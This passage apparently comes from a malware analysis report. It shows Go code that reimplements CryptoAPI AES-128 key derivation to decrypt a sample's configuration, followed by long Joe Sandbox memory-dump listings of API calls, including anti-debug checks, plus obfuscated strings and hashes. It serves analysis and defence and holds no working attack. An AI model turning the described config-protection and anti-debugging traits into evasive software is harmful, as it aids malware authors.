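// CryptSetKeyParam: CBC mode (KP_MODE), an all-zero IV (KP_IV), PKCS#5 padding.
var zeroIV = make([]byte, aes.BlockSize)

// DeriveKeyAES128FromSHA256 reproduces CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)
// where hHash was created with CALG_SHA_256 and fed hashInput through CryptHashData.
// Microsoft's documented rule for SHA-2 hashes: the key is the leading n bytes of the
// finished hash (n = 16 for AES-128). No salt, no iteration count, no 0x36/0x5C step.
func DeriveKeyAES128FromSHA256(hashInput []byte) []byte {
	sum := sha256.Sum256(hashInput)
	return sum[:16]
}

// PKCS5Unpad strips the padding CryptDecrypt removes when Final is TRUE; the error is the
// situation in which CryptDecrypt itself fails with NTE_BAD_DATA.
func PKCS5Unpad(buf []byte) ([]byte, error) {
	if len(buf) == 0 || len(buf)%aes.BlockSize != 0 {
		return nil, errors.New("length is not a multiple of the block size")
	}
	n := int(buf[len(buf)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(buf[len(buf)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#5 padding")
	}
	return buf[:len(buf)-n], nil
}

// DecryptCryptoAPI mirrors CryptDecrypt(hKey, 0, final, 0, pbData, &cb) on a key from
// DeriveKeyAES128FromSHA256. With final=false the padding block is left in place, exactly as
// CryptDecrypt leaves it when the caller passes Final=FALSE.
func DecryptCryptoAPI(hashInput, ciphertext []byte, final bool) ([]byte, error) {
	if len(ciphertext) == 0 || len(ciphertext)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	block, err := aes.NewCipher(DeriveKeyAES128FromSHA256(hashInput))
	if err != nil {
		return nil, err
	}
	plain := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, zeroIV).CryptBlocks(plain, ciphertext)
	if !final {
		return plain, nil
	}
	return PKCS5Unpad(plain)
}

// EncryptCryptoAPI is the matching CryptEncrypt(hKey, 0, TRUE, 0, ...), included so the
// round trip can be checked offline; real use feeds captured ciphertext to DecryptCryptoAPI.
func EncryptCryptoAPI(hashInput, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(DeriveKeyAES128FromSHA256(hashInput))
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, zeroIV).CryptBlocks(out, padded)
	return out, nil
}

func main() {
	// Constructed demo values; the sample's real passphrase and blob are not in the report.
	pass := []byte("demo-passphrase-not-from-sample")
	ct, _ := EncryptCryptoAPI(pass, []byte("constructed config blob"))
	pt, err := DecryptCryptoAPI(pass, ct, true)
	fmt.Printf("key=%x\nplaintext=%q err=%v\n", DeriveKeyAES128FromSHA256(pass), pt, err)
}
```

The practical consequence of the derivation rule is that recovering whatever bytes the sample feeds to CryptHashData (a hard-coded passphrase, a campaign string, a machine-specific value) is all that stands between an analyst and the decrypted configuration; no provider-side secret is involved, and the same 16 bytes come out of any SHA-256 implementation.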
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                    • LocalFree.KERNEL32(00000000), ref: 00402B62
                    • LocalFree.KERNEL32(?), ref: 00402B67
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                    • String ID: %s: %s$Error protecting memory page
                    • API String ID: 839691724-1484484497
                    • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                    • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                    • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                    • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                    APIs
                      • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                      • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04955344
                    • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                    • __Init_thread_footer.LIBCMT ref: 04955652
                    • Sleep.KERNEL32(000007D0), ref: 049559BC
                    • Sleep.KERNEL32(000007D0), ref: 049559D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: @BAO$updateSW
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 3^u$CGm?$`"7/$m*}W$m*}W$zU5o${!~$0?_
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: %D~$6Ny$Zg>$a^k$I5j$RQ{$[J?
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: ![$H\y>$Y>$y);m$|7Y$});m$~-}}
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: sw$(_b}$7PF0$DF7$aFw]$wAi|$~]6
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: * y$7}?$kA_l$ms}$4r:$Qo
                    APIs
                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileInternet$PointerRead
                    • String ID: text
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: *o$\xj$_~V$`\~$dW}
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: &H'$\{u$un}$l}$l}
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: i\$ +}}$J+?$JaZy$D$|
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: S]_$Z#t$rgs$h}
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 3ls$d~?$k~o$?w
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0a~$V-{$`_$&9
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                    • IsDebuggerPresent.KERNEL32 ref: 0040A662
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                    • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                    • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: ;w$1
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: fL7\$v<$
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: v<$
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction Fuzzy Hash:
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction Fuzzy Hash:
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: F
                    • API String ID: 0-1304234792
                    • Opcode ID: d3f9bbbef49f457496a5eb7220fb80fcac0c0ce233f7d966a3f3981da193df12
                    • Instruction ID: dbd6c139b32866210b096a28a816bf10a6ce8a84abce6eefe7beafa0d268f343
                    • Opcode Fuzzy Hash: d3f9bbbef49f457496a5eb7220fb80fcac0c0ce233f7d966a3f3981da193df12
                    • Instruction Fuzzy Hash: 6251F4B3F112254BF3504E38CC543617693DB99325F3E827C8A189B7D9DA7E5C4A8384
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                    • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                    • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                    • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                    • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                    • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                    • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a75f97766c45e66a0b66a70d73656ed0e602064f891330c7fd0213bd175e3bc8
                    • Instruction ID: 885c4469d014df6c7757d4f2505356eb08d9732e4303c17f48b9bc268dcdecd2
                    • Opcode Fuzzy Hash: a75f97766c45e66a0b66a70d73656ed0e602064f891330c7fd0213bd175e3bc8
                    • Instruction Fuzzy Hash: BC5107F39187049FF300AE28DC8576BB7D6EB98320F1B463CEAD497784DA3858058796
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b67daa46d0d8681e244ce9ec364437f02626930302321754f7114ee15dda274
                    • Instruction ID: 6d5bdddc093de907d5141f8de640c428d08ab17739a8e91388ea38c82af7e7f1
                    • Opcode Fuzzy Hash: 7b67daa46d0d8681e244ce9ec364437f02626930302321754f7114ee15dda274
                    • Instruction Fuzzy Hash: 665118F3A0C6049FE3506E1DDC8576ABBD6EBD4320F2B493DDAC497745E63558018682
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbc02d151a17d9ba7cb71315f529ac408a8e24f3016a08a5def29229a22e1b34
                    • Instruction ID: 078b44d9f28eccabe59eab6eea0bf25df57e27ba9d63e85483898e5ae6b0b042
                    • Opcode Fuzzy Hash: dbc02d151a17d9ba7cb71315f529ac408a8e24f3016a08a5def29229a22e1b34
                    • Instruction Fuzzy Hash: 78515AF3E48218ABE3005D39DD44776BBD5DB90360F1B863DEE88A7B84E93A580446C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 30426a83901797fedcdeebba221aaf85410923300e17f338ef93c4b1ef865551
                    • Instruction ID: 03ff96d96e193190bde4a6d85ad41127784d7488d5bf054fb6a4a69d4263f895
                    • Opcode Fuzzy Hash: 30426a83901797fedcdeebba221aaf85410923300e17f338ef93c4b1ef865551
                    • Instruction Fuzzy Hash: 885106F3E482149BF3102929EC457BABBD6DB90324F1B453DDB9893780D97E4C0646C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c07e47112c8b6f5cabd9c025e67e0ac0921ced310a35a996d91162bdf65d7e6
                    • Instruction ID: 46583ba4d93d441b407ff36689c94ccf39daefd5dcdc00afec575cadef95212d
                    • Opcode Fuzzy Hash: 9c07e47112c8b6f5cabd9c025e67e0ac0921ced310a35a996d91162bdf65d7e6
                    • Instruction Fuzzy Hash: 7D51E7F3A091109FE7046E2DDC4576AFAE7EBD8320F2B853DDAC493344E93958158786
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9d0267002f90c66333d7d1825960100aaeeb8f435373ac0cbd095dc85852dcee
                    • Instruction ID: b71f8c50ce0dd72571a0ca5e8b3d2aa1de8da5bf2e161ce718b9c77d89f93982
                    • Opcode Fuzzy Hash: 9d0267002f90c66333d7d1825960100aaeeb8f435373ac0cbd095dc85852dcee
                    • Instruction Fuzzy Hash: 215125F3E082205FE3146E6CDC8577ABBD8EB54710F1A453DEA88D7780E975980483C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c7c83f90df1a05efb0d6b7abcee46baed5b29b77c8ae93b11639095b19dc477f
                    • Instruction ID: 66307d3d0f649762204a05ad1280219598c4186c2c3f8199dd6a88820f2843bb
                    • Opcode Fuzzy Hash: c7c83f90df1a05efb0d6b7abcee46baed5b29b77c8ae93b11639095b19dc477f
                    • Instruction Fuzzy Hash: DC5105B391C600DFD3056E28DC4953AF7E4EB54720F264E2DE9D683782D6399841AB83
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6b17eda27734f431733a89b0efedabcc721bf5373e751bd84014a0a1be3d6a66
                    • Instruction ID: 51e5d7bb09a33c559f4eda56f00f3e769762b2fba68a2913c8f31a6eac990a79
                    • Opcode Fuzzy Hash: 6b17eda27734f431733a89b0efedabcc721bf5373e751bd84014a0a1be3d6a66
                    • Instruction Fuzzy Hash: 4B415AF3A081005BE3005E2DDC4576BBBDAEFD4720F1B853DEAC4D7B44EA7999068296
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51a321f5081bcab23ddb1e56e6c7e940a84ca53432526b138f8c9bcd35899eee
                    • Instruction ID: b8ae7250014d7a60a09f4a4d8bbf48f59db212a0cf37f5946624da84e277c4d9
                    • Opcode Fuzzy Hash: 51a321f5081bcab23ddb1e56e6c7e940a84ca53432526b138f8c9bcd35899eee
                    • Instruction Fuzzy Hash: 46214FB250C308AFE716BE59DC857AAFBE5EF58310F05492DE7D483710E631A9108A97
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
